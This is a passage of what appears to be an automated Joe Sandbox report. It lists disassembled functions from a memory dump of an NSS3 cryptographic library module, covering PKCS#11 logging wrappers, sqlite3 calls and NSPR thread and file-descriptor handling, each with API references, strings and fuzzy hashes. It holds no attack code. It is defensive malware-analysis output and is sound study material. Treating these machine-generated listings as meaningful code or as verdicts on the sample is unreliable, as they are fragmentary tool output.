Instruction Fuzzy Hash: 6E31D071602154ABDB308B998F4CB9A77B9EB4631DF048535E80DA7B12DB34BC49CBD2

Function 6C7A7E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C7A7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A7E63

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C7A7EB1

Strings

ulPartLen = %d, xrefs: 6C7A7EAC
pPart = 0x%p, xrefs: 6C7A7E93
hSession = 0x%x, xrefs: 6C7A7E3E, 6C7A7E4E
C_VerifyUpdate, xrefs: 6C7A7E21
(CK_INVALID_HANDLE), xrefs: 6C7A7E5C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: cc1715ea4aff0fd1ce2f68c9e94cbfa175302204a8a1136ecfc7886dafe390de
Instruction ID: 1fe6ee31407c0c6d3d09c15e657cf5bf8f272929f0a5eaf5c2a850fc949cea21
Opcode Fuzzy Hash: cc1715ea4aff0fd1ce2f68c9e94cbfa175302204a8a1136ecfc7886dafe390de
Instruction Fuzzy Hash: C031E435A02154ABDB308BA8CF4CF9A77B4AB4631DF048535E80997B12DB34BD0ACBD1

Function 6C7A6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C7A6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6F53

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C7A6FA1

Strings

ulPartLen = %d, xrefs: 6C7A6F9C
pPart = 0x%p, xrefs: 6C7A6F83
hSession = 0x%x, xrefs: 6C7A6F2E, 6C7A6F3E
(CK_INVALID_HANDLE), xrefs: 6C7A6F4C
C_DigestUpdate, xrefs: 6C7A6F11

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction ID: 4b93e1f42eeb91376c8466c1885b5b57253024eef81e0e19b44b2d5813fb5491
Opcode Fuzzy Hash: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction Fuzzy Hash: 6131C135602154AFDB309BA8DE4CB9A77B1EB8631DF084435E809A7B12DB34BD49CBD1

Function 6C7A7F30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C7A7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A7F93

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C7A7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C7A7FE1

Strings

hSession = 0x%x, xrefs: 6C7A7F6E, 6C7A7F7E
ulSignatureLen = %d, xrefs: 6C7A7FDC
C_VerifyFinal, xrefs: 6C7A7F51
pSignature = 0x%p, xrefs: 6C7A7FC3
(CK_INVALID_HANDLE), xrefs: 6C7A7F8C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal
API String ID: 1003633598-3315179127
Opcode ID: a8eac8ec418a7832400243fc5d22e44f0904c41543cbf1431420a0d711c77b97
Instruction ID: df8baaeb7782ca7022ef3d0c7229dbc3e416f97d9a23334725aa7a66778f0f7a
Opcode Fuzzy Hash: a8eac8ec418a7832400243fc5d22e44f0904c41543cbf1431420a0d711c77b97
Instruction Fuzzy Hash: B431E431602154ABDB309B98CE4CF9A77B1AB4631DF048531E80997B12DB34BD4ACBE1

Function 6C842D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C842D9F

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

sqlite3_exec.NSS3(?,?,6C842F70,?,?), ref: 6C842DF9
sqlite3_free.NSS3(00000000), ref: 6C842E2C
sqlite3_free.NSS3(?), ref: 6C842E3A
sqlite3_free.NSS3(?), ref: 6C842E52
sqlite3_mprintf.NSS3(6C8AAAF9,?), ref: 6C842E62
sqlite3_free.NSS3(?), ref: 6C842E70
sqlite3_free.NSS3(?), ref: 6C842E89
sqlite3_free.NSS3(?), ref: 6C842EBB
sqlite3_free.NSS3(?), ref: 6C842ECB
sqlite3_free.NSS3(00000000), ref: 6C842F3E
sqlite3_free.NSS3(?), ref: 6C842F4C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction ID: dab63c2c2cbb5af3b0babc9c70a5736d099bd7ad056b0d6129e5b7028318f722
Opcode Fuzzy Hash: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction Fuzzy Hash: 1B61B2B5E042098BEB20CFA8D984BDEB7B2EF49348F118424DC15E7701E739E855CBA5

Function 6C787C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D2120,Function_00097E60,00000000,?,?,?,?,6C80067D,6C801C60,00000000), ref: 6C787C81

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

TlsGetValue.KERNEL32 ref: 6C787CA0
EnterCriticalSection.KERNEL32(?), ref: 6C787CB4
PR_Unlock.NSS3 ref: 6C787CCF

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

TlsGetValue.KERNEL32 ref: 6C787D04
EnterCriticalSection.KERNEL32(?), ref: 6C787D1B
realloc.MOZGLUE(-00000050), ref: 6C787D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C787DF4
PR_Unlock.NSS3 ref: 6C787E0E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 4bbf23d2f05c399132133ec50ebc0216d072c80b908d95eb8890c42465e42329
Instruction ID: dd2e7f7c823a97a50244f6406e382d77fe460f533326ed61ed04ca4c31367473
Opcode Fuzzy Hash: 4bbf23d2f05c399132133ec50ebc0216d072c80b908d95eb8890c42465e42329
Instruction Fuzzy Hash: 0E51F275B061019BDF215F28DA45A6977B5EB4231DF15813AFE0687B22EB30F860CBE0

Function 6C6F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D97
PR_Lock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DBA
PR_WaitCondVar.NSS3 ref: 6C6F4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DEF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction ID: c4cabf4598df70b83e39adecf617076c54a5c36936acca1d704af290c3936c3f
Opcode Fuzzy Hash: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction Fuzzy Hash: 8B4191B5A08611CFCB20AF78D18816977F5BF05328F054639D8989BB00E730E886CBD5

Function 6C887CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C887CE0

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C887D36
PR_Realloc.NSS3(?,00000080), ref: 6C887D6D
PR_GetCurrentThread.NSS3 ref: 6C887D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C887DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C887DD8
malloc.MOZGLUE(00000080), ref: 6C887DF8
PR_GetCurrentThread.NSS3 ref: 6C887E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C887DF0
:%s:%d:0x%lx, xrefs: 6C887DB9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: d01ab27b5d39336ef33ce8b4017dd23a5ce2324fc8ba6d03f7f06ab796a5b27b
Instruction ID: ffadf39a2b8b4a8da82e1af47012e42a743e7027d3d1c4266b319c538720f284
Opcode Fuzzy Hash: d01ab27b5d39336ef33ce8b4017dd23a5ce2324fc8ba6d03f7f06ab796a5b27b
Instruction Fuzzy Hash: 8341D6B16012059FDB24CF28CE8496B37B6FF85318B25496CF8198BF55D731E901C7A1

Function 6C887E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C887E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C887E46

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C887EAF
PR_ImportFile.NSS3(?), ref: 6C887ECF
PR_GetCurrentThread.NSS3 ref: 6C887ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C887F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C887F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C887F15

Strings

NSPR_INHERIT_FDS, xrefs: 6C887E41
%d:0x%lx, xrefs: 6C887EA9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: beff5a2d8dd4e02cb4bfec9dccb5f26baaa49dbf6f202ea2f25d71507b377792
Instruction ID: 36917a2576d83a27c17372552fe1afbe285805e4bb0f593002a4d2cad9c2e24d
Opcode Fuzzy Hash: beff5a2d8dd4e02cb4bfec9dccb5f26baaa49dbf6f202ea2f25d71507b377792
Instruction Fuzzy Hash: F3310471B051199BEB309FADCA40AABB7B9AB06748F100D35F80597E12E7719D04C7E1

Function 6C794E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C794E90
EnterCriticalSection.KERNEL32 ref: 6C794EA9
TlsGetValue.KERNEL32 ref: 6C794EC6
EnterCriticalSection.KERNEL32 ref: 6C794EDF
PL_HashTableLookup.NSS3 ref: 6C794EF8
PR_Unlock.NSS3 ref: 6C794F05
PR_Now.NSS3 ref: 6C794F13
PR_Unlock.NSS3 ref: 6C794F3A

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

bUyl, xrefs: 6C794F3F
bUyl, xrefs: 6C794E5C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUyl$bUyl
API String ID: 326028414-4202475308
Opcode ID: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction ID: c1a13988690f978bb4b4278f0058345b720fb03acfa6c8a37690b58a06c55176
Opcode Fuzzy Hash: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction Fuzzy Hash: 1D4148B4A046059FCB10EF78D1848AABBF0FF49358B058679EC599B711EB30E895CBD1

Function 6C7BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C7BDE64), ref: 6C7BED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BED22

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PL_FreeArenaPool.NSS3(?), ref: 6C7BED4A
PL_FinishArenaPool.NSS3(?), ref: 6C7BED6B
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED38

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C7BED52
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED83
PL_FreeArenaPool.NSS3(?), ref: 6C7BED95
PL_FinishArenaPool.NSS3(?), ref: 6C7BED9D

Part of subcall function 6C7D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7D127C,00000000,00000000,00000000), ref: 6C7D650E

Strings

security, xrefs: 6C7BED06

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction ID: 800bef98b8cdac35a7a42216f96c74972949155a071c9da6d0e01fe728124171
Opcode Fuzzy Hash: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction Fuzzy Hash: 371157769002186BE6205A65AF4ABBB7278AF0160CF060DB4E815B2F40FB74B70CD6D6

Function 6C7A2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C7A2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2D07

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2D22

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
